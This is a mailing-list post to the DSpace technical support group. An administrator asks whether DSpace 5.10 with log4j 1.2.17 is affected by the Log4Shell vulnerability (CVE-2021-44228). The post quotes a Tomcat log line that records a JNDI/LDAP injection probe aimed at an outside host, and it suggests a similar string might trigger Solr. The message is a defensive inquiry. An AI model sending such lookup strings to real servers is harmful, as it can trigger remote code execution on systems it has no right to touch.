Hi,

you might have recognized it since Friday:

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

This affects millions of sites.

This is "red alert" status by the Federal Office for Information Security of 
Germany.

We are still running a DSpace 5.10, which uses log4j in version 1.2.17 (and 
slf4j-log4j12-1.6.1 ?)
On Friday, only version > 2.0.0 <= 2.14.1 were known to be vulnerable, today 
also 1.x is sort of vulnerable, but not like 2.x .

I have already found a trace in the tomcat log:

GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D 
HTTP/1.1" 403 -

It is a 403, however a 404 would be nicer :) .

It was not found in the dspace.log, however, a helping answer from someone with 
more in-deep-knowledge of DSpace logging could save my holiday.

DSpace 7 contains log4j 2.13.3.
Solr is already known to be vulnerable, but I cannot make any assumption about 
that based on how DSpace uses it - maybe a search with a string like 
{jndi:ldap://…} can trigger that.

CU

Michael

-- 
All messages to this mailing list should adhere to the Code of Conduct: 
https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx
--- 
You received this message because you are subscribed to the Google Groups 
"DSpace Technical Support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to dspace-tech+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/dspace-tech/9b372c3dde4a47c89d55bb2a266094a2%40bibliothek.uni-kassel.de.

Reply via email to